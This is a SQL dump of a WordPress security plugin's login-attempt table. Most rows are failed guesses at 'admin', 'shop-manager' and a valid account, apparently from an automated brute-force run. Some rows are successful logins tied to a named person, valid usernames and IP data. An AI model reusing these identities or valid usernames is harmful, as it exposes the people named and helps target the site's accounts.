INSERT INTO `wpxb_wflogins` VALUES (903,2334,1559401547.697125,1,'loginFailValidUsername','nazeer',3,'\0\0\0\0\0\0\0\0\0\0	','Poster'),(904,2335,1559402767.754142,1,'loginFailInvalidUsername','admin-2-2-2-2-2-2',0,'\0\0\0\0\0\0\0\0\0\0Y.lp','Poster'),(905,2336,1559405068.935887,1,'loginFailInvalidUsername','shop-manager',0,'\0\0\0\0\0\0\0\0\0\0Y','Windows Live Writter'),(906,2337,1559407629.532940,1,'loginFailInvalidUsername','admin-2-2-2-2-2-2',0,'\0\0\0\0\0\0\0\0\0\0@w','WordPress'),(907,2338,1559409308.450409,1,'loginFailInvalidUsername','shop-manager',0,'\0\0\0\0\0\0\0\0\0\0)G\"','Windows Live Writter'),(908,2339,1559409880.185833,1,'loginFailValidUsername','nazeer',3,'\0\0\0\0\0\0\0\0\0\0M','Windows Live Writter'),(909,2340,1559411634.535737,1,'loginFailInvalidUsername','admin-2-2-2-2-2-2',0,'\0\0\0\0\0\0\0\0\0\0P','Windows Live Writter'),(910,2341,1559413786.103502,1,'loginFailInvalidUsername','shop-manager',0,'\0\0\0\0\0\0\0\0\0\0Cg','Poster'),(911,2342,1559414153.088296,1,'loginFailValidUsername','nazeer',3,'\0\0\0\0\0\0\0\0\0\0H\"','Poster'),(912,2343,1559415629.564016,1,'loginFailInvalidUsername','admin-2-2-2-2-2-2',0,'\0\0\0\0\0\0\0\0\0\0Y.ja','WordPress'),(913,2344,1559418130.401250,1,'loginFailInvalidUsername','shop-manager',0,'\0\0\0\0\0\0\0\0\0\02U','WordPress'),(914,2345,1559420046.154613,1,'loginFailInvalidUsername','admin-2-2-2-2-2-2',0,'\0\0\0\0\0\0\0\0\0\0Y.k','Poster'),(915,2346,1559422018.809466,1,'loginFailInvalidUsername','shop-manager',0,'\0\0\0\0\0\0\0\0\0\0Y.h','Poster'),(916,2347,1559422728.490079,1,'loginFailValidUsername','nazeer',3,'\0\0\0\0\0\0\0\0\0\0Y.l','WordPress'),(917,2348,1559423631.614392,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0D','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(918,2349,1559424344.770852,1,'loginFailInvalidUsername','admin-2-2-2-2-2-2',0,'\0\0\0\0\0\0\0\0\0\0','Windows Live Writter'),(919,2350,1559426558.541989,1,'loginFailInvalidUsername','shop-manager',0,'\0\0\0\0\0\0\0\0\0\0Y.h','WordPress'),(920,2351,1559427100.452319,1,'loginFailValidUsername','nazeer',3,'\0\0\0\0\0\0\0\0\0\02U','Windows Live Writter'),(921,2352,1559428634.659650,1,'loginFailInvalidUsername','admin-2-2-2-2-2-2',0,'\0\0\0\0\0\0\0\0\0\02>g','Windows Live Writter'),(922,2353,1559430913.446605,1,'loginFailInvalidUsername','shop-manager',0,'\0\0\0\0\0\0\0\0\0\02>','Windows Live Writter'),(923,2354,1559431435.103941,1,'loginFailValidUsername','nazeer',3,'\0\0\0\0\0\0\0\0\0\0j','Poster'),(924,2355,1559432474.631244,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0.%','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(925,2356,1559433067.841832,1,'loginFailInvalidUsername','admin-2-2-2-2-2-2',0,'\0\0\0\0\0\0\0\0\0\02>C','WordPress'),(926,2358,1559435914.602873,1,'loginFailValidUsername','nazeer',3,'\0\0\0\0\0\0\0\0\0\02;','Windows Live Writter'),(927,2359,1559436104.003887,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0D','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(928,2360,1559437495.070832,1,'loginFailInvalidUsername','admin-2-2-2-2-2-2',0,'\0\0\0\0\0\0\0\0\0\02:','Poster'),(929,2361,1559439617.112527,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0J5','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(930,2362,1559440379.916860,1,'loginFailInvalidUsername','shop-manager',0,'\0\0\0\0\0\0\0\0\0\0PUW','Poster'),(931,2363,1559440458.060051,1,'loginFailValidUsername','nazeer',3,'\0\0\0\0\0\0\0\0\0\0','WordPress'),(932,2364,1559442414.647176,1,'loginFailInvalidUsername','admin-2-2-2-2-2-2',0,'\0\0\0\0\0\0\0\0\0\0','Poster'),(933,2365,1559444342.596742,1,'loginFailInvalidUsername','shop-manager',0,'\0\0\0\0\0\0\0\0\0\0.A','WordPress'),(934,2367,1559446901.728347,1,'loginFailInvalidUsername','admin-2-2-2-2-2-2',0,'\0\0\0\0\0\0\0\0\0\0k{','Poster'),(935,2368,1559448632.999866,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(936,2370,1559449785.480846,1,'loginFailValidUsername','nazeer',3,'\0\0\0\0\0\0\0\0\0\02E','WordPress'),(937,2371,1559451565.860275,1,'loginFailInvalidUsername','admin-2-2-2-2-2-2',0,'\0\0\0\0\0\0\0\0\0\0&','Windows Live Writter'),(938,2372,1559453554.573234,1,'loginFailInvalidUsername','shop-manager',0,'\0\0\0\0\0\0\0\0\0\0jZ','Windows Live Writter'),(939,2373,1559454028.670875,1,'loginFailValidUsername','nazeer',3,'\0\0\0\0\0\0\0\0\0\0Y.i~','WordPress'),(940,2374,1559456131.869930,1,'loginFailInvalidUsername','admin-2-2-2-2-2-2',0,'\0\0\0\0\0\0\0\0\0\0B','Poster'),(941,2375,1559458182.665890,1,'loginFailInvalidUsername','shop-manager',0,'\0\0\0\0\0\0\0\0\0\02=','Poster'),(942,2376,1559458458.809960,1,'loginFailValidUsername','nazeer',3,'\0\0\0\0\0\0\0\0\0\0','Windows Live Writter'),(943,2377,1559461076.917013,1,'loginFailInvalidUsername','admin-2-2-2-2-2-2',0,'\0\0\0\0\0\0\0\0\0\0MR','Poster'),(944,2378,1559462370.398057,1,'loginFailInvalidUsername','shop-manager',0,'\0\0\0\0\0\0\0\0\0\0Q{','WordPress'),(945,2379,1559463210.778793,1,'loginFailValidUsername','nazeer',3,'\0\0\0\0\0\0\0\0\0\0','WordPress'),(946,2380,1559465572.039535,1,'loginFailInvalidUsername','admin-2-2-2-2-2-2',0,'\0\0\0\0\0\0\0\0\0\0\\','Windows Live Writter'),(947,2381,1559467176.273536,1,'loginFailInvalidUsername','shop-manager',0,'\0\0\0\0\0\0\0\0\0\03','WordPress'),(948,2382,1559467832.658201,1,'loginFailValidUsername','nazeer',3,'\0\0\0\0\0\0\0\0\0\03M;','Windows Live Writter'),(949,2383,1559468484.190437,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0a','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(950,2384,1559470036.933940,1,'loginFailInvalidUsername','admin-2-2-2-2-2-2',0,'\0\0\0\0\0\0\0\0\0\0/','Poster'),(951,2385,1559470809.269378,1,'loginFailInvalidUsername','[login]',0,'\0\0\0\0\0\0\0\0\0\0gE','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(952,2386,1559472065.882072,1,'loginFailInvalidUsername','shop-manager',0,'\0\0\0\0\0\0\0\0\0\0ky\'','WordPress'),(953,2387,1559472645.417914,1,'loginFailValidUsername','nazeer',3,'\0\0\0\0\0\0\0\0\0\0Pl}\"','Windows Live Writter'),(954,2388,1559474165.544511,1,'loginFailInvalidUsername','admin-2-2-2-2-2-2',0,'\0\0\0\0\0\0\0\0\0\0Y.i','WordPress'),(955,2389,1559475581.683142,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0;s','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(956,2390,1559476789.104386,1,'loginFailInvalidUsername','shop-manager',0,'\0\0\0\0\0\0\0\0\0\0P','Windows Live Writter'),(957,2391,1559477009.627709,1,'loginFailValidUsername','nazeer',3,'\0\0\0\0\0\0\0\0\0\0`~m5','WordPress'),(958,2392,1559477471.248243,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0^e_','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(959,2394,1559480472.749579,1,'loginFailInvalidUsername','shop-manager',0,'\0\0\0\0\0\0\0\0\0\0kx3','Windows Live Writter'),(960,2395,1559480764.374796,1,'loginFailValidUsername','nazeer',3,'\0\0\0\0\0\0\0\0\0\0Mh:','Poster'),(961,2396,1559482220.387443,1,'loginFailInvalidUsername','admin-2-2-2-2-2-2',0,'\0\0\0\0\0\0\0\0\0\0g\"','WordPress'),(962,2397,1559483921.421605,0,'loginOK','Imraan Wajoodeen CA(SA)',1,'\0\0\0\0\0\0\0\0\0\0G)','Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:68.0) Gecko/20100101 Firefox/68.0'),(963,2398,1559484574.607300,1,'loginFailInvalidUsername','shop-manager',0,'\0\0\0\0\0\0\0\0\0\0H','WordPress'),(964,2399,1559486189.516179,0,'loginOK','Imraan Wajoodeen CA(SA)',1,'\0\0\0\0\0\0\0\0\0\0G)','Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:68.0) Gecko/20100101 Firefox/68.0'),(965,2400,1559497769.216505,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(966,2401,1559503228.432152,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0vw','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(967,2402,1559524813.448924,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(968,2403,1559539205.807148,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\02>8','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(969,2404,1559543525.502752,0,'loginOK','nazeer',3,'\0\0\0\0\0\0\0\0\0\0\08','Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36'),(970,2405,1559550070.135479,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0h1','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(971,2406,1559552737.213103,0,'loginOK','Imraan Wajoodeen CA(SA)',1,'\0\0\0\0\0\0\0\0\0\0i&','Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:68.0) Gecko/20100101 Firefox/68.0'),(972,2407,1559553829.048948,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(973,2408,1559560956.643651,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0C','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(974,2409,1559569023.629879,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0;','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(975,2410,1559569110.316249,0,'loginOK','nazeer',3,'\0\0\0\0\0\0\0\0\0\0\08','Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:67.0) Gecko/20100101 Firefox/67.0'),(976,2411,1559573062.256024,1,'loginFailInvalidUsername','companyregistration.online',0,'\0\0\0\0\0\0\0\0\0\0','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(977,2412,1559622462.402490,0,'loginOK','Imraan Wajoodeen CA(SA)',1,'\0\0\0\0\0\0\0\0\0\0i&','Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:68.0) Gecko/20100101 Firefox/68.0'),(978,2413,1559627377.819402,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0H','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(979,2414,1559630129.217381,0,'loginOK','nazeer',3,'\0\0\0\0\0\0\0\0\0\0\08','Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36'),(980,2415,1559631589.063709,0,'loginOK','Imraan Wajoodeen CA(SA)',1,'\0\0\0\0\0\0\0\0\0\0G)','Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:68.0) Gecko/20100101 Firefox/68.0'),(981,2416,1559634249.269789,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0h1','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(982,2424,1559645681.143739,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\02>8','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(983,2425,1559651434.405050,0,'logout','nazeer',3,'\0\0\0\0\0\0\0\0\0\0G)','Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36'),(984,2426,1559651440.054977,0,'loginOK','nazeer',3,'\0\0\0\0\0\0\0\0\0\0G)','Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36'),(985,2427,1559659668.401165,0,'loginOK','nazeer',3,'\0\0\0\0\0\0\0\0\0\0)\rf','Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36'),(986,2428,1559661560.147674,0,'logout','nazeer',3,'\0\0\0\0\0\0\0\0\0\0)\rf','Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36'),(987,2429,1559661565.109967,0,'loginOK','nazeer',3,'\0\0\0\0\0\0\0\0\0\0)\rf','Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36'),(988,2430,1559661571.211609,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0;s','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(989,2432,1559672032.742524,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0u','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(990,2433,1559692886.590305,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(991,2434,1559706552.379754,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0H','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(992,2435,1559716995.019634,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0Y','Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_6; zh-cn) AppleWebKit/533.20.25 (KHTML, like Gecko) Version/5.0.4 Safari/533.20.27'),(993,2436,1559725770.012940,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0D','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(994,2437,1559727585.021887,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0NL','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(995,2438,1559734592.729985,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0hy','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(996,2439,1559741687.354617,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0D;','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(997,2440,1559757048.799783,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0Վ','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(998,2441,1559765617.591818,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0w','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(999,2442,1559781300.278985,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0h\'','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(1000,2443,1559802316.089236,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0?','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(1001,2444,1559802821.820665,1,'loginFailValidUsername','nazeer',3,'\0\0\0\0\0\0\0\0\0\0G)','Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36'),(1002,2445,1559802860.210910,0,'loginOK','nazeer',3,'\0\0\0\0\0\0\0\0\0\0G)','Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36'),(1003,2446,1559807354.577206,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0^f\0','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(1004,2447,1559822240.107604,0,'loginOK','Imraan Wajoodeen CA(SA)',1,'\0\0\0\0\0\0\0\0\0\0i','Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:68.0) Gecko/20100101 Firefox/68.0'),(1005,2448,1559824125.062549,0,'logout','nazeer',3,'\0\0\0\0\0\0\0\0\0\0\08','Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36'),(1006,2449,1559824131.815964,1,'loginFailValidUsername','nazeer',3,'\0\0\0\0\0\0\0\0\0\0\08','Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36'),(1007,2450,1559824134.833754,1,'loginFailValidUsername','nazeer',3,'\0\0\0\0\0\0\0\0\0\0\08','Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36'),(1008,2451,1559824146.158708,0,'loginOK','nazeer',3,'\0\0\0\0\0\0\0\0\0\0\08','Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36'),(1009,2453,1559825044.676276,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0A','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(1010,2454,1559847644.379543,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0e','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(1011,2465,1559854906.510008,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0d','Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.2; Trident/4.0)'),(1012,2466,1559871193.212384,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0ũ','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(1013,2467,1559878595.628824,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0`@','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(1014,2468,1559882553.580270,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(1015,2469,1559886240.168721,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0%;.{','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(1016,2480,1559888572.535901,0,'loginOK','nazeer',3,'\0\0\0\0\0\0\0\0\0\0\08','Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36'),(1017,2481,1559889738.426594,0,'logout','nazeer',3,'\0\0\0\0\0\0\0\0\0\0G)','Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36'),(1018,2482,1559889748.236010,0,'loginOK','nazeer',3,'\0\0\0\0\0\0\0\0\0\0G)','Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36'),(1019,2483,1559891206.988571,0,'logout','nazeer',3,'\0\0\0\0\0\0\0\0\0\0G)','Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36'),(1020,2484,1559891213.622066,0,'loginOK','nazeer',3,'\0\0\0\0\0\0\0\0\0\0G)','Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36'),(1021,2485,1559891607.019061,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0gCY','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(1022,2486,1559893362.591934,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0>r','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(1023,2487,1560176293.915801,0,'loginOK','nazeer',3,'\0\0\0\0\0\0\0\0\0\0\08','Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36'),(1024,2488,1560177966.677947,1,'loginFailInvalidUsername','admin-2-2-2-2-2-2',0,'\0\0\0\0\0\0\0\0\0\0%		','Windows Live Writter'),(1025,2489,1560181674.675967,1,'loginFailInvalidUsername','shop-manager',0,'\0\0\0\0\0\0\0\0\0\0r','WordPress'),(1026,2490,1560182996.689765,1,'loginFailValidUsername','nazeer',3,'\0\0\0\0\0\0\0\0\0\02>','Poster'),(1027,2491,1560185142.667054,1,'loginFailInvalidUsername','admin-2-2-2-2-2-2',0,'\0\0\0\0\0\0\0\0\0\0','WordPress'),(1028,2492,1560186000.871379,0,'loginOK','nazeer',3,'\0\0\0\0\0\0\0\0\0\0)\r_','Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36'),(1029,2493,1560186054.293448,0,'loginOK','nazeer',3,'\0\0\0\0\0\0\0\0\0\0)\r_','Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36'),(1030,2494,1560188857.647120,1,'loginFailInvalidUsername','shop-manager',0,'\0\0\0\0\0\0\0\0\0\0ƻ4','WordPress'),(1031,2495,1560190169.287040,1,'loginFailValidUsername','nazeer',3,'\0\0\0\0\0\0\0\0\0\0','Poster'),(1032,2496,1560192657.704404,1,'loginFailInvalidUsername','admin-2-2-2-2-2-2',0,'\0\0\0\0\0\0\0\0\0\0H','Poster'),(1033,2497,1560195899.724620,1,'loginFailInvalidUsername','shop-manager',0,'\0\0\0\0\0\0\0\0\0\02&','Poster'),(1034,2498,1560197766.110507,1,'loginFailValidUsername','nazeer',3,'\0\0\0\0\0\0\0\0\0\02N','WordPress'),(1035,2499,1560199717.691035,1,'loginFailInvalidUsername','admin-2-2-2-2-2-2',0,'\0\0\0\0\0\0\0\0\0\0Y.i','Windows Live Writter'),(1036,2500,1560203458.224688,1,'loginFailInvalidUsername','shop-manager',0,'\0\0\0\0\0\0\0\0\0\0Y.i','Poster'),(1037,2501,1560205237.992047,1,'loginFailValidUsername','nazeer',3,'\0\0\0\0\0\0\0\0\0\0CǕ','Windows Live Writter'),(1038,2502,1560207659.687117,1,'loginFailInvalidUsername','admin-2-2-2-2-2-2',0,'\0\0\0\0\0\0\0\0\0\0','Poster'),(1039,2504,1560213098.653449,1,'loginFailValidUsername','nazeer',3,'\0\0\0\0\0\0\0\0\0\0k{','Poster'),(1040,2505,1560215206.890057,1,'loginFailInvalidUsername','admin-2-2-2-2-2-2',0,'\0\0\0\0\0\0\0\0\0\0G','Windows Live Writter'),(1041,2506,1560219341.871077,1,'loginFailInvalidUsername','shop-manager',0,'\0\0\0\0\0\0\0\0\0\0H4h','WordPress'),(1042,2507,1560220997.110235,1,'loginFailValidUsername','nazeer',3,'\0\0\0\0\0\0\0\0\0\02>К','Windows Live Writter'),(1043,2508,1560223198.233772,1,'loginFailInvalidUsername','admin-2-2-2-2-2-2',0,'\0\0\0\0\0\0\0\0\0\0Y.i','WordPress'),(1044,2509,1560227182.718757,1,'loginFailInvalidUsername','shop-manager',0,'\0\0\0\0\0\0\0\0\0\0^|]','WordPress'),(1045,2510,1560229098.675534,1,'loginFailValidUsername','nazeer',3,'\0\0\0\0\0\0\0\0\0\05A','Windows Live Writter'),(1046,2511,1560235469.685989,0,'loginOK','nazeer',3,'\0\0\0\0\0\0\0\0\0\0\08','Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36'),(1047,2512,1560235750.057397,1,'loginFailInvalidUsername','shop-manager',0,'\0\0\0\0\0\0\0\0\0\0G','WordPress'),(1048,2513,1560237653.683260,1,'loginFailValidUsername','nazeer',3,'\0\0\0\0\0\0\0\0\0\0CR','Windows Live Writter'),(1049,2514,1560239849.768505,1,'loginFailInvalidUsername','admin-2-2-2-2-2-2',0,'\0\0\0\0\0\0\0\0\0\0','WordPress'),(1050,2515,1560244396.705344,1,'loginFailInvalidUsername','shop-manager',0,'\0\0\0\0\0\0\0\0\0\0','Poster'),(1051,2516,1560246450.935000,1,'loginFailValidUsername','nazeer',3,'\0\0\0\0\0\0\0\0\0\0B','Windows Live Writter'),(1052,2517,1560253133.594791,1,'loginFailInvalidUsername','shop-manager',0,'\0\0\0\0\0\0\0\0\0\02>A','Poster'),(1053,2518,1560255003.867255,1,'loginFailValidUsername','nazeer',3,'\0\0\0\0\0\0\0\0\0\0GF','Windows Live Writter'),(1054,2519,1560257115.729728,0,'loginOK','nazeer',3,'\0\0\0\0\0\0\0\0\0\05','Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36'),(1055,2520,1560257516.627913,1,'loginFailInvalidUsername','admin-2-2-2-2-2-2',0,'\0\0\0\0\0\0\0\0\0\0g\"','WordPress'),(1056,2521,1560261583.738724,1,'loginFailInvalidUsername','shop-manager',0,'\0\0\0\0\0\0\0\0\0\0Y.l','Windows Live Writter'),(1057,2522,1560263970.249930,1,'loginFailValidUsername','nazeer',3,'\0\0\0\0\0\0\0\0\0\0GK','Windows Live Writter'),(1058,2523,1560266545.884174,1,'loginFailInvalidUsername','admin-2-2-2-2-2-2',0,'\0\0\0\0\0\0\0\0\0\0g\Z','Windows Live Writter'),(1059,2524,1560271061.690923,1,'loginFailInvalidUsername','shop-manager',0,'\0\0\0\0\0\0\0\0\0\02>','WordPress'),(1060,2525,1560273225.610899,1,'loginFailValidUsername','nazeer',3,'\0\0\0\0\0\0\0\0\0\0Cm','WordPress'),(1061,2526,1560275571.620378,1,'loginFailInvalidUsername','admin-2-2-2-2-2-2',0,'\0\0\0\0\0\0\0\0\0\0GF','Poster'),(1062,2527,1560278358.625857,0,'loginOK','Imraan Wajoodeen CA(SA)',1,'\0\0\0\0\0\0\0\0\0\0iʿ','Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:68.0) Gecko/20100101 